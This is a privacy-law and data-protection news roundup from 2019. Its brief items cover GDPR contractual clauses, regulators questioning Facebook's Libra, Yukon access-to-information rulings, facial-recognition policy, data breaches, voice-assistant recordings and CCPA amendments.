On August 7, 2019, HAK’s Centre for Information Policy Leadership [CIPL: here] issued a white paper titled “Key Issues Relating to Standard Contractual Clauses for International Transfers and the Way Forward for New Standard Contractual Clauses under the GDPR” [read 13 pg PDF here]. The White Paper was submitted to the European Commission as part of its ongoing work to update EU Standard Contractual Clauses for international transfers (“SCCs”). The White Paper intends to highlight the main challenges organizations currently face when relying on the use of existing SCCs and proposes practical ways to overcome these challenges through updating SCCs in line with the EU General Data Protection Regulation. The White Paper focuses on three main topics as they pertain to SCCs and puts forward various recommendations. The topics include: 1) structural and procedural formalities; 2) updating the substantive obligations contained in SCCs consistent with the GDPR; and 3) practical issues. [It includes six] Key recommendations: a) SCCs should be adapted to multiparty and multiprocessing situations; b) SCCs should enable flexibility in the role of organizations (e.g., SCCs should cover processor-to-processor transfers and consideration should be given to joint-controller situations); c) SCCs should permit organizations to adapt the language to their specific processing contexts as long as a firm set of principles is complied with; d) The broad territorial scope of the GDPR should be considered in updating SCCs; e) The relationship of SCCs with Article 28 contracts under the GDPR should be clarified; and f) A grandfather clause enabling current SCCs to remain valid under the GDPR or, at minimum, enabling organizations to prioritize the uptake of new SCC templates on the basis of specific criteria should be put in place. [Privacy & Information Security Law Blog (Hunton Andrews Kurth)]

Finance

WW – Global Regulators Seek Answers on Facebook’s Libra Project

Regulators from around the world have released a statement over the privacy risks associated with Facebook’s Libra cryptocurrency service. The joint statement was signed by Commissioner of the U.S. Federal Trade Commission Rohit Chopra, Privacy Commissioner of Canada Daniel Therrien, U.K. Information Commissioner Elizabeth Denham, European Data Protection Supervisor Giovanni Buttarelli and commissioners from Albania and Australia. In the statement, regulators asked how the service will be transparent about data use and how Libra will implement privacy by design principles. “We, the signatories to this statement, represent a cross section of the data protection regulation community,” the statement reads. “And while there are differences in our regulatory frameworks and cultures, the potential risks associated with the Libra Network and our expectations of the Libra Network to protect personal information are common to us all.” [priv.gc.ca]

UK – Data Protection Watchdog Raises Concerns Over Facebook’s Libra

The U.K.’s Information Commissioner’s Office released a joint statement [along with the privacy authorities from Albania, Australia, Burkina Faso, Canada, European Union and the USA] on global privacy expectations of the Libra network on Aug. 5 that is addressed to Facebook and 28 other organizations behind the Libra and Calibra [see here] projects demanding they provide details on how they plan to protect user data [read ICO PR here & 4 pg PDF joint statement here]. The letter specifically asks the companies to explain how they plan to collect and process users’ personal data according to data protection laws and notes that the Libra Association will become a custodian of massive amounts of user financial data, adding: “These risks are not limited to financial privacy, since the involvement of Facebook Inc., and its expansive categories of data collection on hundreds of millions of users, raises additional concerns.” Information Commissioner Elizabeth Denham said: “We know that the Libra Network has already opened dialogue with many financial regulators on how it intends to comply with financial services product rules. However, given the rapid plans for Libra and Calibra, we are concerned that there is little detail available about the information handling practices that will be in place to secure and protect personal information.” In July, U.S. lawmakers grilled Facebook’s David Marcus on the new project in a series of hearings at the Senate and the House of Representatives. Facebook told its investors in its latest quarterly report that, while the firm expects to launch Libra next year, regulatory pushback could significantly delay or prevent its release. [CoinTelagraph]

FOI

CA – Acknowledging the Existence of Records is an Invasion of Privacy: OIPC

The territory’s Information and Privacy Commissioner Diane McLeod-McKay [here] has ruled the Public Service Commission [PSC: here] was correct in refusing to confirm or deny the existence of certain records for an applicant seeking information about a PSC employee. She issued the decision document July 3 [read 19 pg PDF here], though a press release about the decision was not released until Aug. 12 [read here] that provided the required time for the PSC to respond to the decision and implement any recommendations. The PSC accepted and implemented one recommendation provided by McLeod-McKay ahead of the 30-day time limit. According to McLeod-McKay: “Looking at the ATIPP (Access to Information and Protection of Privacy) Act [see 59 pg PDF here] as a whole, and its purposes, it is clear that exceptions to access to information are carefully crafted to limit access only as much as necessary to protect certain interests. These exceptions were designed to strike the correct balance between the right of applicants to access information and the need for public bodies to limit access in specific circumstances. This provision should only be relied on by public bodies when it is necessary to protect certain interests.” This marks the first time this section of the ATIPP Act has been reviewed by the IPC, she said. Throughout her decision, McLeod-McKay cited access to information and privacy protection cases in other regions including British Columbia, Alberta and Ontario. The decision is available on the IPC’s website. Should the applicant choose to challenge McLeod-McKay’s decision, they would have to take it to Yukon Supreme Court for a ruling. [Yukon News]

CA – YK OIPC Stresses YG’s Duty to Assist Applicants

Diane McLeod-McKay, the Yukons’s Information and Privacy Commissioner [IPC: here], has issued a decision in a case in which an applicant had made 30 access to information requests to one Yukon government department over a period of a year which she says shows one of the potential restrictions on the right to access information [see IPC PR here & 64 pg PDF decision here]. The department asked McLeod-McKay to grant it relief, under the Access to Information and Protection of Privacy Act (ATIPP Act), to disregard seven of the requests. The Applicant’s position was that the department was improperly processing the access to formation requests – which led the applicant to make numerous requests. McLeod-McKay agreed with the department that the seven requests were repetitious or systematic in nature. Requiring the department to process them, after it had already processed 23 of the applicant’s access requests, would unreasonably interfere with its operations, she found. She also authorized the department to disregard future access requests from the applicant that it finds to be (according to the tests set out in the IPC decision) repetitious or systematic and that would unreasonably interfere with its operations. [In her July 31 PR – read here] McLeod-McKay said: “Section 43 of the ATIPP Act [see 59 pg PDF here] empowers me to authorize public bodies such as (the) Yukon government departments to disregard access to information requests under certain conditions. However, restricting access to information rights should not be taken lightly, and should only occur after careful consideration of all the facts. Authorizing this type of restriction under Section 43 should be the exception to the rule and not a routine option for public bodies to avoid their obligations under the ATIPP legislation.” However McLeod-McKay indicated that the government’s records manager and the department may have failed to meet their combined duty to assist the applicant saying: “Many of the access to information requests in this case lacked detail. Requests that do not clearly identify the records or information sought can lead to misinterpretations, which can result in some records being missed, or in access being given to unrelated records. This is serious. When a public body receives an access request, there should be no room for interpretation about the records or information sought by an applicant. If a public body receives an access request that is not clear, it must work with the records manager to clarify the request.” [Whitehorse Star]

Health / Medical

CA – Canadians Ready to Modernize Health Care with Technology, Poll Suggests

Findings from an Ipsos poll/report, titled “The Future of Connected Health Care” conducted between June 26 and July 2 on behalf of the Canadian Medical Association were released [read CMA PR & PDF]. It suggests the majority of Canadians are ready to embrace more technology in health care, and it seems many would even trust a private company like Google or Apple with personal data if that meant 24-hour access to their doctor. Many respondents believed technology can reduce wait times and improve access through virtual visits, and that robot-assisted surgery can improve overall health. Most respondents believed technology was already good for health care, with 68 per cent agreeing it helped their doctor keep them informed, and 63 per cent agreeing it improved their health-care experience. Eight in 10 were interested in the ability to access all of their health information on one electronic platform and seven in 10 believed that having such a platform would reduce medical errors. But there were also concerns — 77% worried about losing human connection, 75% feared risking their privacy four in 10 respondents said they would subscribe to a private, paid virtual service to store personal health information if it could connect them to their doctor or health team whenever they wanted. The report notes that overall, digital approaches are “vastly underutilized (or unavailable) in Canada,” with just 1 per cent of Canadians reporting that they had used virtual care or online patient portals. The survey involved interviews with 2,005 Canadians aged 18 and older and has a margin of error of plus-or-minus 2.5 percentage points, 19 times out of 20. [HuffPost Canada | Canadians ready for more health care tech, despite privacy concerns: survey | Canadians ready for health care to modernize, CMA poll suggests]

US – Study Explores Privacy Impacts of Prescription Drug Monitoring Programs

Prescription drug monitoring programs [PDMP] operate in all 50 states and the District of Columbia. These statewide electronic databases of prescriptions dispensed for controlled substances were established in response to the opioid overdose crisis. Their purpose is to facilitate drug diversion investigations by law enforcement, change prescribing behavior, and reduce “doctor shopping” by patients who seek drugs for nonmedical use. In 28 states it is mandatory for providers to access the database and screen each time before prescribing any controlled substance to any patient. There is evidence that PDMPs have contributed to the dramatic 42% decline in prescription opioid volume since 2011. Many healthcare practitioners cite the inconvenience and workflow disruptions of mandatory-access PDMPs as deterrents to prescribing, while others fear scrutiny from law enforcement and licensing authorities — even for appropriate medical prescribing. This is unintentionally causing the undertreatment of patients with acute and chronic pain and, in some cases, the abrupt withdrawal of treatment from chronic pain patients. There is also evidence that PDMPs increase crime by driving nonmedical users from diverted prescription opioids to more harmful heroin and fentanyl, thus fueling overdoses. Finally, PDMPs pose a serious risk to medical privacy by allowing law enforcement to access confidential medical records without a warrant based on probable cause, which may be in violation of the Fourth Amendment. An expert panel will examine the positive and negative effects of PDMPs on patient care, patient privacy, the overdose rate, and crime, hoping to learn whether they do more harm than good. [Cato Institute]

Horror Stories

UK – Unsecured Database Exposes Biometric, Personal Data of 1M in UK

The biometric and personal information of 1 million U.K. citizens was discovered on an unsecured, publicly accessible database owned by biotech company Suprema. The database hosted facial-recognition information, unencrypted usernames and passwords, and personal information of employees. A URL manipulation done by a group of Israeli researchers allowed access to the database, which held 27.8 million records in all. “If there has been any definite threat on our products and/or services, we will take immediate actions and make appropriate announcements to protect our customers’ valuable businesses and assets,” Suprema Head of Marketing Andy Ahn said. Meanwhile, U.K. Information Commissioner Elizabeth Denham has put out a statement voicing her privacy concerns regarding facial-recognition tech at King’s Cross in London. [Guardian]

US – SEC Probing Insurance Company Over Data Breach of 885M Records

The U.S. Securities and Exchange Commission has opened an investigation into a data security vulnerability at real estate title insurance firm First American Financial Corporation that led to a leak of 885 million personal and financial records. Bank account numbers and statements, mortgage and tax records, Social Security numbers, wire transaction receipts and driver’s license images were among the records that were exposed. The hacked information was linked to mortgage deals dating back to 2003. First American put out a statement July 16 saying that an in-house investigation revealed just 32 consumers were subject to the leak. [KrebsOnSecurity]

Law Enforcement

CA – Montreal Grapples With Privacy Concerns as More Canadian Police Forces Use Facial Recognition

Independent Montreal city Councillor, Marvin Rotrand, wants facial recognition technology banned and he’s preparing a motion that would put a moratorium on using the technology until clear rules are put in place. He told CBC Montreal’s Daybreak [listen here] that the city’s bylaws should be updated so that they can keep pace with advances in artificial intelligence, to protect citizens’ “privacy and the protection of our democratic values.” Montreal Mayor Valérie Plante told reporters council will debate the use of such technology by the city and its police force. Montreal police would not say whether or not it is already using facial recognition technology, but it is being used by police elsewhere in Canada. The Toronto Police Service said last year a pilot project using the technology was an “immediate success” in helping identify suspects. The force spent $451,718 to buy their system, using funding from a policing grant from the Ontario government. Calgary police began using the technology in 2014. However, privacy advocates argue that innocent people can get swept up as verifying someone’s identity gets outsourced to AI. There is also criticism that facial recognition technology is more accurate matching white faces than black ones. Montreal has become a hub for artificial intelligence research, including by Microsoft and Google. Idemia [see here] One of the largest vendors of face recognition and other biometric identification technology in the United States also has a presence in Montreal. Rotrand wants the federal government to create laws governing the use of facial recognition, but for the time being he says it’s important that city council send a clear message to police that they aren’t free to use it as they please. Even as the technology becomes more reliable, he says the threat to Montrealers’ privacy will remain. Paired with security cameras, “the police would now have a tool that would basically follow you all day long,” he said. [CBC News]

US – Police Remove Real-Time Use of Facial Recognition from Proposed Policy

Detroit police officials removed one of the most contentious provisions of its proposed policy on the use of facial-recognition software — the use of the tech in real time during a terror threat. If the revised policy is approved, police officers who violate the policy face criminal charges or dismissal. The New York Times reports the New York Police Department has uploaded thousands of arrest photos of children and teenagers between the ages of 11 to 16 years into a facial-recognition database. Opponents of the program cite concerns the technology is unreliable when used on children, particularly as children age. [Detroit News]

Location

WW – Dating Apps May Have Exposed Exact Locations of 10M Users

Security flaws found in four dating apps may have revealed the exact locations of a combined 10 million users. Research firm Pen Test Partners created a tool that found 3Fun, Grindr, Romeo and Recon were each leaking precise locations of their users. “By supplying spoofed locations (latitude and longitude) it is possible to retrieve the distances to these profiles from multiple points, and then triangulate or trilaterate the data to return the precise location of that person,” researchers from Pen Test Partners said. Additionally, 3Fun was found to be exposing users’ birthdates, pictures and chat data. [ZDNet]

Offshore

CN – Increased Digital Services Raise Data Privacy Concerns in China

Chinese consumers are enjoying the benefits and ease of digital services but also coming around to the data privacy concerns that come with them. Data use in the digital economy is chief among concerns as detailed personal information is being gathered for simple online purchases, like movie tickets or food. Also, the China Consumers Association recently noted that a large number of mobile apps were pulling too much data, including user location, contact lists and mobile numbers. “Concerns are rising among Chinese internet users over data collection and related security issues,” former Sootoo Institute Head Dingding Zhang said. “The users who don’t care about personal data leaks probably don’t realise how it can hurt them.” [Abacus]

Online Privacy

US – FBI Proposing New Surveillance on Social Media

A push by the Federal Bureau of Investigation to improve the monitoring of threats posted on social media may create privacy issues for those companies. Facebook’s privacy policies would be most infringed upon by the FBI’s proposal, which involves pulling public data from platforms to help curtail violence and crimes. The proposed surveillance goes against Facebook’s rules and policies prohibiting the use of data for surveillance purposes, the report states. The FBI said its proposal only involves publicly available data and that data would be collected “while ensuring all privacy and civil liberties compliance requirements are met.” [The Wall Street Journal]

WW – Twitter Reveals It May Have Shared Data Without Consent for Targeted Ads

Twitter announced it may have shared data with third parties without user consent for the purpose of sending targeted advertisements. The social media platform outlined two scenarios where data may have been inadvertently shared due to issues with the site’s settings. Since May 2018, any user who viewed ads on a mobile device and subsequently interacted with Twitter’s mobile app may have been affected, the site said in a blog post. The other scenario involved Twitter sending targeted ads based on inferences it made about users’ devices, which dated back to September 2018. Twitter said it fixed these issues on Aug. 5, 2019 and is conducting an investigation to determine the amount of impacted users. [Reuters]

WW – Some Robocall-Blocking Apps Are Violating User Privacy

Cybersecurity firm NCC Group found that some robocall-blocking apps may be violating user privacy as soon as the apps are opened. A number of apps sent user and device data to third-party data analytic companies without user consent. Other apps uploaded device data as soon they were opened and before users accepted privacy policies, while others sent information to Facebook as soon as the apps loaded. “Without having a technical background, most end users aren’t able to evaluate what data is actually being collected and sent to third parties,” NCC Group Senior Security Consultant Dan Hastings said. [TechCrunch]

Other Jurisdictions

AU – NTC Seeks Curtailed Vehicle Data Collection in Australia

Australia’s National Transport Commission has called for new regulations that would limit the government’s collection of vehicle data. The NTC has been examining government access to the data and whether the current collection methods carry sufficient privacy protections. “Data generated by these technologies has the potential to inform and enhance government decision making, but at the same time this technology raises potential new privacy challenges for individuals,” the NTC wrote in its “Regulating government access to C-ITS and automated vehicle data“ policy paper. [ZDNet]

Privacy (US)

US – CIPL Releases White Paper on Updating SCCs for International Transfers

The Centre for Information Policy Leadership submitted a white paper to the European Commission as the branch continues its work to update standard contractual clauses for international transfers, according to a post. The white paper focuses on the challenges organizations face when they use existing SCCs and how these issues can be overcome by updating them to align with the EU General Data Protection Regulation. The CIPL’s recommendations for updating SCCs include ensuring they are adapted to fit multiparty and multiprocessing situations and that the broad territorial scope of the GDPR should be considered when the SCCs are overhauled. [FHunto Andrews Kurthull Story]

UK – Human Transcription of Audio Chats Draws Scrutiny from Regulators

The Irish Data Protection Commission has asked Facebook about how it had paid contractors to transcribe users’ audio. The tech company said it was allowed to perform the activity after consumers opted in to the practice. “We are now seeking detailed information from Facebook on the processing in question and how Facebook believes that such processing of data is compliant with their GDPR obligations,” the agency said in a statement. In response to the Facebook report, U.S. lawmakers have renewed their calls for new privacy legislation. Meanwhile, Microsoft updated its privacy notice to state that staff members and contractors may listen to recordings gathered by Cortana devices and Skype Translator products. A spokesperson said, “We realized, based on questions raised recently, that we could do a better job specifying that humans sometimes review this content.” [Politico]

US – Senators Voice Concerns Over Facebook’s Handling of Children’s Privacy

U.S. Sens. Ed Markey, D-Mass., and Richard Blumenthal, D-Conn., have reached out to Facebook CEO Mark Zuckerberg with questions regarding the social network’s privacy policies and standards for children. Markey and Blumenthal wrote a letter to Zuckerberg seeking details on a vulnerability discovered in Facebook’s Messenger Kids app that allowed users to communicate with people without parental consent. “Children’s privacy and safety online should be Messenger Kids’ top priority,” Markey and Blumenthal wrote. “Your company has a responsibility to meet its promise to parents that children are not exposed to unapproved contacts, a promise that it appears that Facebook has not fulfilled.” [The Hill | Mark Zuckerberg questioned by senators over children’s privacy protections in new letter | Senators question whether Facebook is doing enough to protect kids’ privacy | Messenger Kids: a flaw allows children to interact with unauthorized contacts | Facebook fails to keep Messenger Kids’ safety promise]

US – Google Has 2017 Cookies Settlement Struck Down by US Court Of Appeals

The 3rd U.S. Circuit Court of Appeals in Philadelphia has voided Google’s 2017 settlement regarding the unauthorized installment of cookies in users’ Safari and Internet Explorer browsers. The court of appeals voted 3-0 on the matter, saying the fairness and adequacy of the $5.5 million settlement was unclear and it did not pay users for their hardships. The case has been referred back to a U.S. District Court in Delaware, where the voided deal was originally approved. [Reuters]

US – Class-Action Suit Filed Over Unauthorized Siri Recordings

Apple has been hit with a class-action suit in California for alleged privacy violations related to Siri voice recordings and the human reviews of the recordings. The lawsuit claims Apple broke a state privacy law prohibiting recording of people without their permission. The plaintiffs also alleged Apple wasn’t truthful when answering questions from Congress about its privacy policies. Apple, which announced a halt to its human review programthis week, has said the recordings it collects and reviews are stripped of personally identifiable information. Meanwhile, Vice reports there’s evidence that Microsoft contractors are potentially listening to Skype calls. [Bloomberg]

US – Court of Appeals Allows $35B Suit Against Facebook to Move Forward

The U.S. 9th Circuit Court of Appeals in Illinois has ruled a $35 billion class-action suit against Facebook for improper use of facial recognition tech can advance. The original case was brought forward in 2015 with claims the social network did not obtain consent or provide details to users about how long their facial data would be stored when it started mapping their faces in 2011. Facebook has argued there were no grounds to sue because the mapping did not cause any personal harm. U.S. Circuit Judge Sandra Ikuta wrote in the court’s decision that Facebook’s tactics “invades an individual’s private affairs and concrete interests.” [Courthouse News Service]

Privacy Enhancing Technologies (PETs)

WW – Webkit Releases New Tracking Prevention Policy

Open-source engine WebKit announced it has released a new tracking prevention policy. The new policy states WebKit aims to prevent any form of covert and cross-site tracking, as well as fingerprinting and other unknown forms of tracking. “If a particular tracking technique cannot be completely prevented without undue user harm, WebKit will limit the capability of using the technique,” the policy states. “For example, limiting the time window for tracking or reducing the available bits of entropy — unique data points that may be used to identify a user or a user’s behavior.” [TechCrunch]

RFID / IoT

US – NIST Publishes Report on Cybersecurity Measures for IoT Manufacturers

The U.S. National Institute of Standards and Technology has published a draft report titled “Core Cybersecurity Feature Baseline for Securable IoT Devices: A Starting Point for IoT Device Manufacturers.” The document contains baseline cybersecurity features internet-of-things manufacturers can voluntary implement in the devices they produce. The draft builds upon NIST’s “Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks.” NIST announced it will accept public comments on the new publication until Sept. 30. [CSRC.NIST.gov | NIST Releases Draft Security Feature Recommendations for IoT Devices ]

Security

US – NIST Launches New Cybersecurity Blog

The U.S. National Institute of Standards and Technology has announced the creation of Cybersecurity Insights: a NIST blog. The new forum is an expansion of a previous NIST blog but will include posts on privacy engineering, the internet of things, artificial intelligence, small business, cryptography, cybersecurity education, the Cybersecurity Framework, the Privacy Framework and more. “While identity is just as important to us as it always has been, NIST conducts extensive work in the cybersecurity and privacy arenas,” NIST wrote in the post. “That portfolio of activities is growing, as is the need for a blog that addresses these varied and ever-evolving fields.” [NIST.gov]

US – Educational Software Provider Says Students at 13K Schools Affected by Breach

Pearson, a U.K.-based educational software provider, has alerted more than 13,000 school districts, mostly in the U.S., that a data breach potentially exposed the information of thousands of students in each district. The U.S. Federal Bureau of Investigation notified Pearson of a cyberattack in March that compromised names, birthdates and email addresses. “We have notified the affected customers as a precaution,” a Pearson spokesman said. Information on affected districts has begun to roll in, starting Wednesday with 114,000 students at Nevada’s Washoe County School District. The Las Vegas Review-Journal reports that Nevada’s Clark County School District had 560,000 victimized by the breach. [The Wall Street Journal]

Smart Cars and Cities

US – Surveillance Concerns Raised Over Use of Streetlamp Cameras

The American Civil Liberties Union and other privacy groups are asking San Diego officials to enact surveillance protections when footage from streetlamp cameras are used in police investigations. Over the last year, the San Diego Police Department has reviewed streetlamp camera footage in more than 140 investigations. The SDPD said the footage is not shared for immigration purposes and the “video is stored on the device and erased every five days if not downloaded for an investigation.” Privacy groups have raised concerns about the lack of oversight to the program. “Decisions about how to use surveillance technology should not be made unilaterally by law enforcement or another city agency,” said ACLU Technology and Civil Liberties Attorney Matt Cagle. [The Los Angeles Times]

Surveillance

HK – Airline Reveals Use of Onboard Cameras to Record Passengers

Hong Kong airline Cathay Pacific revealed it is recording passenger activity via inflight entertainment systems and video cameras in an effort to improve and personalize the flying experience. The airline says images are not being recorded from the backseat cameras, but “there are CCTV cameras installed in our airport lounges and onboard aircraft (one camera, positioned near the cockpit door) for security purposes.” The airline says passenger data is stored on secure servers, but cautions in its updated privacy policy that “no data transmission over the internet, a website, mobile application or via email or other message service can be guaranteed to be secure from intrusion.” Further, the airline tells customers it will keep their personal data for “as long as is necessary.” [CNN]

WW – Big Tech Companies Halt Voice Recording Reviews

Apple and Amazon are ending reviews of their digital voice assistants to ease user privacy concerns. Apple was the first to announce its plans to curtail analysis of Siri recordings, saying it will review its accuracy grading system and then allow users to opt out of reviews during a future software update. Meanwhile, Amazon revised its privacy notice for Alexa voice recordings. The update allows Amazon users to opt out of human reviews of Alexa recordings by selecting a new option in the app settings. In the wake of the decisions, Brian Barrett wrote an op-ed for Wired about ending privacy concerns over voice assistants by offering an opt-in option for the human reviews. [The Washington Post]

US Legislation

US – CCPA Update: Senate Committee Approves Privacy Law Amendments

Amendments to the California Consumer Privacy Act (CCPA) continued to advance, as the California legislature returned from its summer recess. With just five weeks to go until the September 13th deadline for the legislature to pass bills, and fewer than five months until the CCPA is set to take effect, the Senate Appropriations Committee gave the greenlight to six bills: AB 25, AB 846, AB 1564, AB 1146, AB 874, and AB 1355. The bills were ordered to a “second reading,” meaning they head to the Senate floor for consideration without a further hearing in the Senate Appropriations Committee. Two of those bills, AB 874 and AB 1355, will be placed on the Senate’s consent calendar, because they have not been opposed. The Senate Appropriations Committee also voted to advance AB 1202, the data broker amendment, but placed the bill in the Committee’s suspense file. This procedural action holds bills that will have a significant fiscal impact on the State of California’s budget for consideration all at once to ensure that fiscal impacts are considered as a whole. Here’s the full list of amendments as of August 12, 2019. A) Those Ordered to Second Reading in the California Senate: 1) EMPLOYEE EXEMPTION – Assembly Bill 25 changes the CCPA so that the law does not cover collection of personal information from job applicants, employees, business owners, directors, officers, medical staff, or contractors; 2) LOYALTY PROGRAMS – Assembly Bill 846 provides certainty to businesses that certain prohibitions in the CCPA would not apply to loyalty or rewards programs; 3) CONSUMER REQUEST FOR DISCLOSURE METHODS – Assembly Bill 1564 requires businesses to provide two methods for consumers to submit requests for information, including, at a minimum, a toll-free telephone number. A business that operates exclusively online and has a direct relationship with a consumer from whom it collects personal information is only required to provide an email address for submitting CCPA requests; 4) VEHICLE WARRANTIES & RECALLS – Assembly Bill 1146 exempts vehicle information retained or shared for purposes of a warranty or recall-related vehicle repair; 5) PUBLICLY AVAILABLE INFORMATION – Assembly Bill 874streamlines the definition of “publicly available” to mean information that is lawfully made available from federal, state, or local government records. The bill also seeks to amend the definition of “personal information” to exclude deidentified or aggregate consumer information; and 6) CLARIFYING AMENDMENTS – Assembly Bill 1355 exempts deidentified or aggregate consumer information from the definition of personal information, among other clarifying amendments. B) Those Placed on Suspense File of the Senate Committee on Appropriations: 1) DATA BROKER REGISTRATION – Assembly Bill 1202requires data brokers to register with the California Attorney General. [Ad Law Access (Kelley Drye)]

US – One-Month Countdown to Pass CCPA Amendments Begins

On August 12, the California legislature returned after its summer recess. The legislature now has approximately a month to continue the markups and send California Consumer Privacy Act [CCPA: see here & infographic here] amendments to the Governor’s desk for signature before the September 13 deadline. Any amendment that passes from the Senate will likely need to go back to the Assembly since many of them have been marked up significantly by the Senate. This blog post is a very useful summary of the seven amendments that are moving forward and what they mean for businesses who are working on implementing a CCPA program. The following are links to other CCPA articles from the NRF Data Protection Report:

Sources: Data Protection Report (Norton Rose Fulbright) | Security Privacy Bytes | CPA Amendment Progress Report: July Update | CCPA: The (Qualified) Right to Deletion | What Startups Should Know About the California Consumer Privacy Act | California Senate Committee Blesses Majority of CCPA Amendments | A Recap of the Senate Judiciary Committee Hearing on Amending the California Consumer Privacy Act | Crunch Time in California – CCPA Amendments Hotly Debated and (Some) Defeated – Employee Data Is Back, Reasonable Definition of Personal Information Is Gone (For Now), and More!]

+++

 

16-31 July 2019

Biometrics

US – Digital Map Identifies Where US Govt is Using Facial-Recognition Tech

Digital rights advocacy group Fight for the Future released a digital map detailing how U.S. law enforcement agencies use facial-recognition technology to scan photos without the knowledge or consent of individuals, Vox reports. The map is comprised of data pulled from the Center on Privacy and Technology at Georgetown Law, news reports, news releases and other sources. Examples include states where the Federal Bureau of Investigation uses facial-recognition tech to scan Department of Motor Vehicle databases, airports where Customs and Border Protection screens passengers on international flights, and cities that use the technology to identify and arrest suspects. In other news, the Orlando Weekly reports the city has ended its two-phase pilot program with Amazon’s Rekognition citing technological glitches, adding there is “no immediate plans regarding future pilots to explore this type of facial recognition technology.” [vox.com]

US – Proposed US Law Bans Use of Facial-Recognition Tech in Public Housing

U.S. federal lawmakers are expected to introduce a bill that would ban public housing units that receive funding from the Department of Housing and Urban Development from using facial-recognition technology. Reps. Yvette Clarke, D-N.Y., Ayanna Pressley, D-Mass., and Rashida Tlaib, D-Mich., are the co-sponsors of the No Biometric Barriers to Housing Act. Under the proposed legislation, HUD would be required to submit a report outlining the impact facial recognition has on the housing units and their tenants. This is the first federal bill that addresses limits on technology and tenants. [CNET]

Big Data | Artificial Intelligence | Machine Learning

UK – ICO Explores Bias and Discrimination in AI

A recent post on the ICO’s AI Auditing Framework blog explores human bias and discrimination in AI systems, together with some of the technical and organisational measures which can be implemented to mitigate the legal risks associated with these issues. With the increasing prevalence of AI systems, particularly those used for making automated decisions about individuals, it is increasingly important for organisations to be aware of the risks associated with bias and discriminatory behaviour in AI systems. The most appropriate technical and organisational measures for mitigating these risks will be situation-dependent, but organisations implementing such systems should, at a minimum, consider undertaking a DPIA, maximise the integrity of data sets used for training, and ensure that the system is tested and monitored for unbalanced behaviour. The blog post also notes that, whilst not a legal requirement, having a diverse workforce may be a powerful tool to manage bias and discrimination in AI systems, and suggests that undertaking an exercise to identify and prevent bias and discrimination in AI systems may also provide an opportunity for organisations to uncover and address any existing discriminatory practices generally. [Data Notes (Herbert Smith Freehills)]

Canada

CA – Canada, US Begin New Phase of Cross-Border Data Sharing

The Canada Border Services Agency and U.S. Customs and Border Protection will begin to share biographic data, travel documents and other data related to border crossings. The announcement marks the launch of the third phase of the “Beyond the Border” security agreement the two countries agreed to back in 2011. The U.S. Department of Homeland Security said in a statement the cross-border sharing will help the two governments determine how long an individual has been in a country and those who have gone past their period of admission. [CBC News]

Encryption

US – Attorney General Backs Encryption Backdoors

U.S. Attorney General William Barr has reopened a dispute between the government and tech industry regarding encrypted messages. Speaking at a cybersecurity conference in New York City, Barr alleged that fully encrypted messaging has allowed “criminals to operate with impunity” as encryption stymies law enforcement’s ability to identify criminals. “Making our virtual world more secure should not come at the expense of making us more vulnerable in the real world,” Barr said. “But unfortunately, this is where we appear to be headed.” Barr added that the tech industry should consider giving law enforcement backdoor access but noted the time to cooperate and act “may be limited.” [The Hill]

US – Researchers Study Ways to Combat Quantum Attacks

Cybersecurity researchers are working to get ahead of quantum computer attacks, which could be a threat in years to come. Quantum computers have the potential to allow hackers to work faster when navigating backdoors to execute security breaches. The defense being explored to prevent these attacks is post-quantum cryptography, which can be installed with current computer technology and then remain relevant and useful when quantum attacks become a reality in the future. The U.S. National Institute of Standards and Technology has narrowed the list of proposed defense solutions from 69 to 26 over the last three years. [MIT Technology Review]

EU Developments

EU – Countries Receive New ePrivacy Regulation Proposals

The Finnish presidency of the Council of the European Union has drawn up new ePrivacy Regulation proposals and sent them to fellow EU nations. Finnish official Maija Rönkä tweeted that the proposals focus on updates to Articles 5-7, adding that the changes include “dividing (Article 6) into four articles to simplify the text and a temporary solution regarding the child imagery issue.” The proposals come after Germany published a 77-page position paper saying it could not accept the regulation as it stands due to a lack of protections for the confidentiality of communications, which are covered in Article 6. The proposals will be discussed at the EU Council’s Telecom Working Party Sept. 9. [Politico Pro.eu]

EU – European Commission Issues Report on the Implementation of the GDPR

On July 24, 2019, the European Commission published a report [see 20 pg PDF here] appraising Europe’s progress in implementing the General Data Protection Regulation [GDPR – here] as a central component of its revamped data protection framework. In its report, the Commission highlights certain achievements resulting from implementation efforts, calls attention to issues that require further action, and describes several ongoing and planned initiatives. The report is a follow-up to a prior report [see 18 pg PDF here] issued in January 2018, and was informed to a great extent by the ongoing work of the Multi-stakeholder Group, which is comprised of civil society and business representatives, academics and practitioners, to support the application of the GDPR. The report will contribute to the Commission’s formal 2-year review of the GDPR to take place in May 2020. [This blog post discusses the issues under the following headers]: 1) Member States; 2) Supervisory Authorities; 3) Individual rights and businesses’ compliance efforts; 4) International cooperation; and 5) Data protection legislation across EU legal policy. The Commissions concludes its report by stating that the first year of the application of the GDPR has been overall positive, but there is still work to be done in a number of areas. This is an understatement. [Inside Privacy (Covington)]

EU – Study Reveals 1 In 3 EU Businesses Not in Compliance with GDPR

A report from accounting company RSM shows one-third of EU businesses are still working toward complying with the EU General Data Protection Regulation. The report, which is based on responses from 300 companies, shows 57% of respondents have confidence that they are in compliance with the law. Medium-sized businesses are lagging most with compliance while “struggling to understand and implement,” according to the report. “With so much pressure on organisations to meet complex requirements, we saw GDPR fatigue setting in last year,” RSM U.K. Technology Risk Assurance Partner Steven Snaith said. [ITProPortal]

UK – Research Shows Data Breach Reports Tripled Since GDPR Took Effect

According to research from law firm RPC, data breach reports in the U.K. have risen by 175% in the last year. There have been 379 breach reports since the EU General Data Protection Regulation took force last May, while there were just 138 the year prior. “GDPR has driven a cultural shift in how people perceive personal data and its value,” RPC Partner Richard Breavington said. “More people now see it as part of their personal property, and they are more likely to act if they believe it is being misused.” [Yahoo Finance UK]

EU – EDPB Releases 2018 Annual Report

